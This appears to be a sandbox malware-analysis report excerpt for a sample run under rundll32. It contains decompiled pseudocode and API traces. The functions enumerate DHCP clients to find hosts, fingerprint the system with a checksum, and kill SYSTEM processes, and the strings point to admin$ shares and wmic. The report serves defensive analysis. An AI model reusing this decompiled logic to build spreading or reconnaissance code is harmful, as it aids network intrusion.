                                                                                                                                                                • Part of subcall function 04E268B5: GetProcessHeap.KERNEL32(00000008,?,76B5C0B0,00000000), ref: 04E268EB
                                                                                                                                                                • Part of subcall function 04E268B5: HeapAlloc.KERNEL32(00000000), ref: 04E268F4
                                                                                                                                                                • Part of subcall function 04E268B5: memcpy.MSVCRT ref: 04E26921
                                                                                                                                                                • Part of subcall function 04E268B5: GetProcessHeap.KERNEL32(00000008,?,74654D40), ref: 04E26946
                                                                                                                                                                • Part of subcall function 04E268B5: HeapAlloc.KERNEL32(00000000), ref: 04E26949
                                                                                                                                                                • Part of subcall function 04E268B5: memcpy.MSVCRT ref: 04E26978
                                                                                                                                                                • Part of subcall function 04E268B5: GetProcessHeap.KERNEL32(00000000,?,?), ref: 04E26995
                                                                                                                                                                • Part of subcall function 04E268B5: HeapFree.KERNEL32(00000000), ref: 04E26998
                                                                                                                                                                • Part of subcall function 04E268B5: GetProcessHeap.KERNEL32(00000000,?), ref: 04E2699F
                                                                                                                                                                • Part of subcall function 04E268B5: HeapFree.KERNEL32(00000000), ref: 04E269A2
                                                                                                                                                              • WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 04E29EF9
                                                                                                                                                              • SetLastError.KERNEL32(00000057,00000000,00000000,00000000,?,04E29FCE,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000003,?), ref: 04E29F17
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$CloseHandleProcess$Path$Filewsprintf$ErrorLast$Connection2Exists$AllocCancelCreateFindFreeThreadTokenmemcpy$AppendCodeCurrentDeleteDirectoryDuplicateExitExtensionNameObjectOpenSingleSystemUserWaitmemset
                                                                                                                                                              • String ID: %ws $D$W$\\%s\admin$$\\%ws\admin$\%ws$cscc.dat$wbem\wmic.exe
                                                                                                                                                              • API String ID: 659518118-2685502051
                                                                                                                                                              • Opcode ID: 3deba0626d790513042ccb31468eeafa74dfe45cfa3ce7ff7c1a672ade4c0055
                                                                                                                                                              • Instruction ID: ce5c9642548da70e400c470ba1c0f79c2fc530bd15fbf8ea74c7fc09619b0bd0
                                                                                                                                                              • Opcode Fuzzy Hash: 3deba0626d790513042ccb31468eeafa74dfe45cfa3ce7ff7c1a672ade4c0055
                                                                                                                                                              • Instruction Fuzzy Hash: ADB11CB1A00229EFDF61DFA1CD88EEEBBB8FF44305F1065A6E505A2111D735AA80DF51
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 17%
                                                                                                                                                              			E04E28D39(intOrPtr _a4) {
                                                                                                                                                              				void* _v12;
                                                                                                                                                              				void* _v16;
                                                                                                                                                              				char _v20;
                                                                                                                                                              				signed int _v24;
                                                                                                                                                              				long _v28;
                                                                                                                                                              				char _v32;
                                                                                                                                                              				char _v36;
                                                                                                                                                              				char _v40;
                                                                                                                                                              				char _v44;
                                                                                                                                                              				char _v48;
                                                                                                                                                              				intOrPtr _v52;
                                                                                                                                                              				char _v56;
                                                                                                                                                              				intOrPtr _v60;
                                                                                                                                                              				char _v64;
                                                                                                                                                              				char _v584;
                                                                                                                                                              				void* __esi;
                                                                                                                                                              				char* _t58;
                                                                                                                                                              				intOrPtr _t61;
                                                                                                                                                              				intOrPtr _t64;
                                                                                                                                                              				intOrPtr _t71;
                                                                                                                                                              				intOrPtr _t73;
                                                                                                                                                              				signed int _t83;
                                                                                                                                                              				intOrPtr* _t85;
                                                                                                                                                              				void* _t86;
                                                                                                                                                              				signed int _t88;
                                                                                                                                                              				intOrPtr* _t89;
                                                                                                                                                              
                                                                                                                                                              				_t83 = 0;
                                                                                                                                                              				_t88 = 0;
                                                                                                                                                              				_v48 = 0;
                                                                                                                                                              				_v44 = 0;
                                                                                                                                                              				_v12 = 0;
                                                                                                                                                              				_v20 = 0;
                                                                                                                                                              				_v16 = 0;
                                                                                                                                                              				_v28 = 0;
                                                                                                                                                              				_v24 = 0;
                                                                                                                                                              				_v32 = 0;
                                                                                                                                                              				_v40 = 0;
                                                                                                                                                              				_v36 = 0;
                                                                                                                                                              				_v64 = 0;
                                                                                                                                                              				_v56 = 0x104;
                                                                                                                                                              				__imp__GetComputerNameExW(4,  &_v584,  &_v56);
                                                                                                                                                              				_t58 =  &_v584;
                                                                                                                                                              				__imp__DhcpEnumSubnets(_t58,  &_v48, 0x400,  &_v12,  &_v32,  &_v40);
                                                                                                                                                              				if(_t58 != 0) {
                                                                                                                                                              					L15:
                                                                                                                                                              					return 0;
                                                                                                                                                              				}
                                                                                                                                                              				_t61 =  *_v12;
                                                                                                                                                              				_v60 = _t61;
                                                                                                                                                              				if(_t61 <= 0) {
                                                                                                                                                              					L14:
                                                                                                                                                              					__imp__DhcpRpcFreeMemory(_v12);
                                                                                                                                                              					goto L15;
                                                                                                                                                              				} else {
                                                                                                                                                              					goto L2;
                                                                                                                                                              				}
                                                                                                                                                              				do {
                                                                                                                                                              					L2:
                                                                                                                                                              					_t64 =  *((intOrPtr*)(_v12 + 4));
                                                                                                                                                              					__imp__DhcpGetSubnetInfo(0,  *((intOrPtr*)(_t64 + _t83 * 4)),  &_v20);
                                                                                                                                                              					if(_t64 == 0 &&  *((intOrPtr*)(_v20 + 0x1c)) == 0) {
                                                                                                                                                              						_t71 =  *((intOrPtr*)(_v12 + 4));
                                                                                                                                                              						__imp__DhcpEnumSubnetClients(0,  *((intOrPtr*)(_t71 + _t83 * 4)),  &_v44, 0x10000,  &_v16,  &_v36,  &_v64);
                                                                                                                                                              						if(_t71 != 0) {
                                                                                                                                                              							goto L13;
                                                                                                                                                              						}
                                                                                                                                                              						_t73 =  *_v16;
                                                                                                                                                              						_v52 = _t73;
                                                                                                                                                              						if(_t73 == 0 || _t88 >= _t73) {
                                                                                                                                                              							L12:
                                                                                                                                                              							__imp__DhcpRpcFreeMemory(_v16);
                                                                                                                                                              							goto L13;
                                                                                                                                                              						} else {
                                                                                                                                                              							do {
                                                                                                                                                              								_t89 =  *((intOrPtr*)( *((intOrPtr*)(_v16 + 4)) + _t88 * 4));
                                                                                                                                                              								if(_t89 != 0) {
                                                                                                                                                              									_push( *_t89);
                                                                                                                                                              									_t85 = __imp__#14;
                                                                                                                                                              									if(E04E2A567( *_t85()) != 0) {
                                                                                                                                                              										__imp__#12( *_t85( *_t89));
                                                                                                                                                              										_t86 = E04E2641A(_t78);
                                                                                                                                                              										if(_t86 != 0) {
                                                                                                                                                              											E04E26B95(_t79, 0, _a4);
                                                                                                                                                              											HeapFree(GetProcessHeap(), 0, _t86);
                                                                                                                                                              										}
                                                                                                                                                              									}
                                                                                                                                                              								}
                                                                                                                                                              								_t88 = _v24 + 1;
                                                                                                                                                              								_v24 = _t88;
                                                                                                                                                              							} while (_t88 < _v52);
                                                                                                                                                              							goto L12;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					L13:
                                                                                                                                                              					_t83 = _v28 + 1;
                                                                                                                                                              					_v28 = _t83;
                                                                                                                                                              				} while (_t83 < _v60);
                                                                                                                                                              				goto L14;
                                                                                                                                                              			}





























                                                                                                                                                              0x04e28d52
                                                                                                                                                              0x04e28d54
                                                                                                                                                              0x04e28d58
                                                                                                                                                              0x04e28d5b
                                                                                                                                                              0x04e28d5e
                                                                                                                                                              0x04e28d61
                                                                                                                                                              0x04e28d64
                                                                                                                                                              0x04e28d67
                                                                                                                                                              0x04e28d6a
                                                                                                                                                              0x04e28d6d
                                                                                                                                                              0x04e28d70
                                                                                                                                                              0x04e28d73
                                                                                                                                                              0x04e28d76
                                                                                                                                                              0x04e28d79
                                                                                                                                                              0x04e28d80
                                                                                                                                                              0x04e28d9b
                                                                                                                                                              0x04e28da2
                                                                                                                                                              0x04e28daa
                                                                                                                                                              0x04e28ea2
                                                                                                                                                              0x04e28ea6
                                                                                                                                                              0x04e28ea6
                                                                                                                                                              0x04e28db3
                                                                                                                                                              0x04e28db5
                                                                                                                                                              0x04e28dba
                                                                                                                                                              0x04e28e97
                                                                                                                                                              0x04e28e9a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e28dc0
                                                                                                                                                              0x04e28dc0
                                                                                                                                                              0x04e28dc7
                                                                                                                                                              0x04e28dce
                                                                                                                                                              0x04e28dd6
                                                                                                                                                              0x04e28e00
                                                                                                                                                              0x04e28e07
                                                                                                                                                              0x04e28e0f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e28e14
                                                                                                                                                              0x04e28e16
                                                                                                                                                              0x04e28e1b
                                                                                                                                                              0x04e28e7e
                                                                                                                                                              0x04e28e81
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e28e21
                                                                                                                                                              0x04e28e21
                                                                                                                                                              0x04e28e27
                                                                                                                                                              0x04e28e2c
                                                                                                                                                              0x04e28e2e
                                                                                                                                                              0x04e28e30
                                                                                                                                                              0x04e28e40
                                                                                                                                                              0x04e28e47
                                                                                                                                                              0x04e28e53
                                                                                                                                                              0x04e28e57
                                                                                                                                                              0x04e28e5e
                                                                                                                                                              0x04e28e6c
                                                                                                                                                              0x04e28e6c
                                                                                                                                                              0x04e28e57
                                                                                                                                                              0x04e28e40
                                                                                                                                                              0x04e28e75
                                                                                                                                                              0x04e28e76
                                                                                                                                                              0x04e28e79
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e28e21
                                                                                                                                                              0x04e28e1b
                                                                                                                                                              0x04e28e87
                                                                                                                                                              0x04e28e8a
                                                                                                                                                              0x04e28e8b
                                                                                                                                                              0x04e28e8e
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • GetComputerNameExW.KERNEL32(00000004,?,?,00000000,7404C4E0,00000000), ref: 04E28D80
                                                                                                                                                              • DhcpEnumSubnets.DHCPSAPI(?,?,00000400,?,?,?), ref: 04E28DA2
                                                                                                                                                              • DhcpGetSubnetInfo.DHCPSAPI(00000000,?,?), ref: 04E28DCE
                                                                                                                                                              • DhcpEnumSubnetClients.DHCPSAPI(00000000,?,?,00010000,00000400,?,?), ref: 04E28E07
                                                                                                                                                              • htonl.WS2_32(00000000), ref: 04E28E36
                                                                                                                                                              • htonl.WS2_32(00000000), ref: 04E28E44
                                                                                                                                                              • inet_ntoa.WS2_32(00000000), ref: 04E28E47
                                                                                                                                                                • Part of subcall function 04E2641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,04E28E53,000000FF,00000000,00000000,00000000,00000000,77974AB0,?,04E28E53,00000000), ref: 04E26439
                                                                                                                                                                • Part of subcall function 04E2641A: GetProcessHeap.KERNEL32(00000000,00000000,?,04E28E53,00000000), ref: 04E26446
                                                                                                                                                                • Part of subcall function 04E2641A: HeapAlloc.KERNEL32(00000000,?,04E28E53,00000000), ref: 04E2644D
                                                                                                                                                                • Part of subcall function 04E2641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,04E28E53,000000FF,00000000,00000000,?,04E28E53,00000000), ref: 04E26465
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 04E28E65
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E28E6C
                                                                                                                                                              • DhcpRpcFreeMemory.DHCPSAPI(00000400), ref: 04E28E81
                                                                                                                                                              • DhcpRpcFreeMemory.DHCPSAPI(?), ref: 04E28E9A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Dhcp$Heap$Free$ByteCharEnumMemoryMultiProcessSubnetWidehtonl$AllocClientsComputerInfoNameSubnetsinet_ntoa
                                                                                                                                                              • String ID: Oet Uet0Xet
                                                                                                                                                              • API String ID: 4121633671-3175316637
                                                                                                                                                              • Opcode ID: f858ccbe8c97e146c579c19f4d168f4e8e21499c2a6086f8cbace73b542f5bd7
                                                                                                                                                              • Instruction ID: 93da3c879a77ba61f1a4625cac58b63921d87a5725871854dfb935ba0b8e5c3a
                                                                                                                                                              • Opcode Fuzzy Hash: f858ccbe8c97e146c579c19f4d168f4e8e21499c2a6086f8cbace73b542f5bd7
                                                                                                                                                              • Instruction Fuzzy Hash: C841D5B2D00229AFDB11EFA9DE84DDEBBB9FB48304F104156E641E7220D775AA408B60
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 91%
                                                                                                                                                              			E04E257E5(long _a4, void _a8, void* _a12, intOrPtr _a16) {
                                                                                                                                                              				int _v8;
                                                                                                                                                              				void* _v12;
                                                                                                                                                              				void* _v16;
                                                                                                                                                              				int _v20;
                                                                                                                                                              				struct _TIME_ZONE_INFORMATION _v192;
                                                                                                                                                              				void** _t62;
                                                                                                                                                              				void* _t66;
                                                                                                                                                              				long _t69;
                                                                                                                                                              				signed int _t73;
                                                                                                                                                              				signed int _t74;
                                                                                                                                                              				void* _t88;
                                                                                                                                                              				void* _t91;
                                                                                                                                                              				void* _t96;
                                                                                                                                                              				int _t101;
                                                                                                                                                              				long _t102;
                                                                                                                                                              				int _t103;
                                                                                                                                                              				void _t104;
                                                                                                                                                              				void _t105;
                                                                                                                                                              				void* _t106;
                                                                                                                                                              				void* _t107;
                                                                                                                                                              				void* _t108;
                                                                                                                                                              				int _t109;
                                                                                                                                                              				void* _t110;
                                                                                                                                                              				void* _t111;
                                                                                                                                                              				void* _t113;
                                                                                                                                                              				void* _t114;
                                                                                                                                                              				void* _t115;
                                                                                                                                                              				void* _t116;
                                                                                                                                                              
                                                                                                                                                              				_t109 = 0;
                                                                                                                                                              				_v20 = 0;
                                                                                                                                                              				if(_a16 != 0) {
                                                                                                                                                              					_t96 = LocalAlloc(0x40, 0xf0);
                                                                                                                                                              					_v12 = _t96;
                                                                                                                                                              					if(_t96 != 0) {
                                                                                                                                                              						 *_t96 = _a8;
                                                                                                                                                              						 *((intOrPtr*)(_t96 + 4)) = GetSystemDefaultLCID();
                                                                                                                                                              						if(GetTimeZoneInformation( &_v192) != 0xffffffff) {
                                                                                                                                                              							 *(_t96 + 8) = _v192.Bias;
                                                                                                                                                              						}
                                                                                                                                                              						_t10 = _t96 + 0xc; // 0xc
                                                                                                                                                              						memcpy(_t10, _a12, 0x21);
                                                                                                                                                              						_t116 = _t115 + 0xc;
                                                                                                                                                              						_t62 =  &_v16;
                                                                                                                                                              						_v16 = _t109;
                                                                                                                                                              						__imp__NetWkstaGetInfo(0x4e30494, 0x64, _t62, _t111);
                                                                                                                                                              						if(_t62 == 0) {
                                                                                                                                                              							_t114 = _v16;
                                                                                                                                                              							if( *(_t114 + 8) != _t109) {
                                                                                                                                                              								_t91 =  *(_t114 + 8);
                                                                                                                                                              								_t108 = _t91 + 2;
                                                                                                                                                              								do {
                                                                                                                                                              									_t105 =  *_t91;
                                                                                                                                                              									_t91 = _t91 + 2;
                                                                                                                                                              								} while (_t105 != _t109);
                                                                                                                                                              								_t109 = (_t91 - _t108 >> 1) + (_t91 - _t108 >> 1) + 2;
                                                                                                                                                              							}
                                                                                                                                                              							_t101 = 0;
                                                                                                                                                              							if( *(_t114 + 4) != 0) {
                                                                                                                                                              								_t88 =  *(_t114 + 4);
                                                                                                                                                              								_t107 = _t88 + 2;
                                                                                                                                                              								do {
                                                                                                                                                              									_t104 =  *_t88;
                                                                                                                                                              									_t88 = _t88 + 2;
                                                                                                                                                              								} while (_t104 != 0);
                                                                                                                                                              								_t101 = (_t88 - _t107 >> 1) + (_t88 - _t107 >> 1) + 2;
                                                                                                                                                              							}
                                                                                                                                                              							if(_t109 != 0 && _t109 <= 0xc3) {
                                                                                                                                                              								memcpy(_v12 + 0x2d,  *(_t114 + 8), _t109);
                                                                                                                                                              								_t116 = _t116 + 0xc;
                                                                                                                                                              							}
                                                                                                                                                              							if(_t101 != 0 && _t101 <= 0xc3 - _t109) {
                                                                                                                                                              								_t29 = _v12 + 0x2d; // 0x2d
                                                                                                                                                              								memcpy(_t109 + _t29,  *(_t114 + 4), _t101);
                                                                                                                                                              								_t116 = _t116 + 0xc;
                                                                                                                                                              							}
                                                                                                                                                              							NetApiBufferFree(_t114);
                                                                                                                                                              							_t96 = _v12;
                                                                                                                                                              							_t109 = 0;
                                                                                                                                                              						}
                                                                                                                                                              						_a12 = _t109;
                                                                                                                                                              						_v8 = _t109;
                                                                                                                                                              						if(E04E256D8( &_v8, _a4, _t96,  &_a12) != 0) {
                                                                                                                                                              							_t69 = _v8 + 9;
                                                                                                                                                              							_a4 = _t69;
                                                                                                                                                              							_t113 = LocalAlloc(0x40, _t69);
                                                                                                                                                              							if(_t113 != _t109) {
                                                                                                                                                              								 *(_t113 + 1) = _a8;
                                                                                                                                                              								 *_t113 = 0x66;
                                                                                                                                                              								_t41 = _t113 + 5; // 0x5
                                                                                                                                                              								_t73 = memcpy(_t41, _a12, _v8);
                                                                                                                                                              								_t103 = _v8;
                                                                                                                                                              								_t106 = _t103 + 5;
                                                                                                                                                              								_t74 = _t73 | 0xffffffff;
                                                                                                                                                              								_t110 = _t113;
                                                                                                                                                              								if(_t106 != 0) {
                                                                                                                                                              									do {
                                                                                                                                                              										_t74 = _t74 >> 0x00000008 ^  *(0x4e33078 + (( *_t110 & 0x000000ff ^ _t74) & 0x000000ff) * 4);
                                                                                                                                                              										_t110 = _t110 + 1;
                                                                                                                                                              										_t106 = _t106 - 1;
                                                                                                                                                              									} while (_t106 != 0);
                                                                                                                                                              									_t96 = _v12;
                                                                                                                                                              								}
                                                                                                                                                              								 *(_t113 + _t103 + 5) =  !_t74;
                                                                                                                                                              								_v20 = E04E25780(_t103, _t113, _a4, _a16);
                                                                                                                                                              								LocalFree(_t113);
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						_t102 = 0xf0;
                                                                                                                                                              						_t66 = _t96;
                                                                                                                                                              						do {
                                                                                                                                                              							 *_t66 = 0;
                                                                                                                                                              							_t66 = _t66 + 1;
                                                                                                                                                              							_t102 = _t102 - 1;
                                                                                                                                                              						} while (_t102 != 0);
                                                                                                                                                              						LocalFree(_t96);
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return _v20;
                                                                                                                                                              			}































                                                                                                                                                              0x04e257ef
                                                                                                                                                              0x04e257f1
                                                                                                                                                              0x04e257f7
                                                                                                                                                              0x04e2580b
                                                                                                                                                              0x04e2580d
                                                                                                                                                              0x04e25812
                                                                                                                                                              0x04e2581b
                                                                                                                                                              0x04e25823
                                                                                                                                                              0x04e25836
                                                                                                                                                              0x04e2583e
                                                                                                                                                              0x04e2583e
                                                                                                                                                              0x04e25847
                                                                                                                                                              0x04e2584b
                                                                                                                                                              0x04e25850
                                                                                                                                                              0x04e25853
                                                                                                                                                              0x04e2585e
                                                                                                                                                              0x04e25861
                                                                                                                                                              0x04e25869
                                                                                                                                                              0x04e2586f
                                                                                                                                                              0x04e25875
                                                                                                                                                              0x04e25877
                                                                                                                                                              0x04e2587a
                                                                                                                                                              0x04e2587d
                                                                                                                                                              0x04e2587d
                                                                                                                                                              0x04e25880
                                                                                                                                                              0x04e25883
                                                                                                                                                              0x04e2588c
                                                                                                                                                              0x04e2588c
                                                                                                                                                              0x04e25890
                                                                                                                                                              0x04e25895
                                                                                                                                                              0x04e25897
                                                                                                                                                              0x04e2589a
                                                                                                                                                              0x04e2589d
                                                                                                                                                              0x04e2589d
                                                                                                                                                              0x04e258a0
                                                                                                                                                              0x04e258a3
                                                                                                                                                              0x04e258ac
                                                                                                                                                              0x04e258ac
                                                                                                                                                              0x04e258b2
                                                                                                                                                              0x04e258c7
                                                                                                                                                              0x04e258cc
                                                                                                                                                              0x04e258cc
                                                                                                                                                              0x04e258d1
                                                                                                                                                              0x04e258e5
                                                                                                                                                              0x04e258ea
                                                                                                                                                              0x04e258ef
                                                                                                                                                              0x04e258ef
                                                                                                                                                              0x04e258f3
                                                                                                                                                              0x04e258f9
                                                                                                                                                              0x04e258fc
                                                                                                                                                              0x04e258fc
                                                                                                                                                              0x04e25909
                                                                                                                                                              0x04e2590c
                                                                                                                                                              0x04e25916
                                                                                                                                                              0x04e2591b
                                                                                                                                                              0x04e25921
                                                                                                                                                              0x04e2592a
                                                                                                                                                              0x04e2592e
                                                                                                                                                              0x04e25933
                                                                                                                                                              0x04e25936
                                                                                                                                                              0x04e2593c
                                                                                                                                                              0x04e25943
                                                                                                                                                              0x04e25948
                                                                                                                                                              0x04e2594b
                                                                                                                                                              0x04e25951
                                                                                                                                                              0x04e25954
                                                                                                                                                              0x04e25958
                                                                                                                                                              0x04e2595a
                                                                                                                                                              0x04e25968
                                                                                                                                                              0x04e2596f
                                                                                                                                                              0x04e25970
                                                                                                                                                              0x04e25970
                                                                                                                                                              0x04e25973
                                                                                                                                                              0x04e25973
                                                                                                                                                              0x04e2597e
                                                                                                                                                              0x04e25989
                                                                                                                                                              0x04e2598c
                                                                                                                                                              0x04e2598c
                                                                                                                                                              0x04e2592e
                                                                                                                                                              0x04e25992
                                                                                                                                                              0x04e25997
                                                                                                                                                              0x04e2599a
                                                                                                                                                              0x04e2599a
                                                                                                                                                              0x04e2599d
                                                                                                                                                              0x04e2599e
                                                                                                                                                              0x04e2599e
                                                                                                                                                              0x04e259a2
                                                                                                                                                              0x04e259a2
                                                                                                                                                              0x04e259a8
                                                                                                                                                              0x04e259ae

                                                                                                                                                              APIs
                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,000000F0,00000000,00000000), ref: 04E25805
                                                                                                                                                              • GetSystemDefaultLCID.KERNEL32 ref: 04E2581D
                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?), ref: 04E2582D
                                                                                                                                                              • memcpy.MSVCRT ref: 04E2584B
                                                                                                                                                              • NetWkstaGetInfo.NETAPI32(04E30494,00000064,?), ref: 04E25861
                                                                                                                                                              • memcpy.MSVCRT ref: 04E258C7
                                                                                                                                                              • memcpy.MSVCRT ref: 04E258EA
                                                                                                                                                              • NetApiBufferFree.NETAPI32(?,?,?,?), ref: 04E258F3
                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?,?,00000000,?,?,?,?), ref: 04E25924
                                                                                                                                                              • memcpy.MSVCRT ref: 04E25943
                                                                                                                                                              • LocalFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?), ref: 04E2598C
                                                                                                                                                              • LocalFree.KERNEL32(00000000,00000000,?,?,?,?), ref: 04E259A2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Localmemcpy$Free$Alloc$BufferDefaultInfoInformationSystemTimeWkstaZone
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2529142246-0
                                                                                                                                                              • Opcode ID: bfb27b1b0d5ec7c582c83a7102f88c394aabbf5545afc9f963613b8e600fc68c
                                                                                                                                                              • Instruction ID: 2426be21353de35b07ff3e01c5a6ac8e75957187ecab63f56616150ba76ec0ce
                                                                                                                                                              • Opcode Fuzzy Hash: bfb27b1b0d5ec7c582c83a7102f88c394aabbf5545afc9f963613b8e600fc68c
                                                                                                                                                              • Instruction Fuzzy Hash: 3E51E67190031AEFEB20DF68CE84EAAB7B5FF48319F048925E955D7241E775EA00CB50
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 88%
                                                                                                                                                              			E04E2841D(int _a4) {
                                                                                                                                                              				void* _v8;
                                                                                                                                                              				void* _v12;
                                                                                                                                                              				void* _v16;
                                                                                                                                                              				short _v20;
                                                                                                                                                              				struct _SID_IDENTIFIER_AUTHORITY _v24;
                                                                                                                                                              				long _t20;
                                                                                                                                                              				int _t21;
                                                                                                                                                              				long* _t31;
                                                                                                                                                              				void* _t38;
                                                                                                                                                              
                                                                                                                                                              				if(( *0x4e37bc0 & 0x00000002) != 0) {
                                                                                                                                                              					_t20 = GetCurrentProcessId();
                                                                                                                                                              					if(_a4 != _t20) {
                                                                                                                                                              						_t21 = OpenProcess(0x401, 0, _a4);
                                                                                                                                                              						_t38 = _t21;
                                                                                                                                                              						if(_t38 != 0) {
                                                                                                                                                              							if(OpenProcessToken(_t38, 0xe,  &_v16) != 0) {
                                                                                                                                                              								if(DuplicateToken(_v16, 2,  &_v12) != 0) {
                                                                                                                                                              									_v24.Value = 0;
                                                                                                                                                              									_v20 = 0x500;
                                                                                                                                                              									if(AllocateAndInitializeSid( &_v24, 1, 0x12, 0, 0, 0, 0, 0, 0, 0,  &_v8) != 0) {
                                                                                                                                                              										_t31 =  &_a4;
                                                                                                                                                              										_a4 = 0;
                                                                                                                                                              										__imp__CheckTokenMembership(_v12, _v8, _t31);
                                                                                                                                                              										if(_t31 != 0 && _a4 != 0) {
                                                                                                                                                              											TerminateProcess(_t38, 0);
                                                                                                                                                              										}
                                                                                                                                                              										FreeSid(_v8);
                                                                                                                                                              									}
                                                                                                                                                              									CloseHandle(_v12);
                                                                                                                                                              								}
                                                                                                                                                              								CloseHandle(_v16);
                                                                                                                                                              							}
                                                                                                                                                              							_t21 = CloseHandle(_t38);
                                                                                                                                                              						}
                                                                                                                                                              						return _t21;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return _t20;
                                                                                                                                                              			}












                                                                                                                                                              0x04e2842a
                                                                                                                                                              0x04e28430
                                                                                                                                                              0x04e28439
                                                                                                                                                              0x04e2844c
                                                                                                                                                              0x04e28452
                                                                                                                                                              0x04e28456
                                                                                                                                                              0x04e28472
                                                                                                                                                              0x04e28485
                                                                                                                                                              0x04e2849a
                                                                                                                                                              0x04e2849d
                                                                                                                                                              0x04e284ab
                                                                                                                                                              0x04e284ad
                                                                                                                                                              0x04e284b4
                                                                                                                                                              0x04e284ba
                                                                                                                                                              0x04e284c2
                                                                                                                                                              0x04e284cb
                                                                                                                                                              0x04e284cb
                                                                                                                                                              0x04e284d4
                                                                                                                                                              0x04e284d4
                                                                                                                                                              0x04e284dd
                                                                                                                                                              0x04e284dd
                                                                                                                                                              0x04e284e2
                                                                                                                                                              0x04e284e2
                                                                                                                                                              0x04e284e5
                                                                                                                                                              0x04e284e7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e284e9
                                                                                                                                                              0x04e28439
                                                                                                                                                              0x04e284eb

                                                                                                                                                              APIs
                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,04E28555,?,?), ref: 04E28430
                                                                                                                                                              • OpenProcess.KERNEL32(00000401,00000000,?,?,?,?,04E28555,?,?), ref: 04E2844C
                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,0000000E,?,00000000,?,?,?,04E28555,?,?), ref: 04E28464
                                                                                                                                                              • DuplicateToken.ADVAPI32(?,00000002,?,?,?,?,04E28555,?,?), ref: 04E2847D
                                                                                                                                                              • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 04E284A3
                                                                                                                                                              • CheckTokenMembership.ADVAPI32(?,?,?), ref: 04E284BA
                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 04E284CB
                                                                                                                                                              • FreeSid.ADVAPI32(?), ref: 04E284D4
                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 04E284DD
                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,04E28555,?,?), ref: 04E284E2
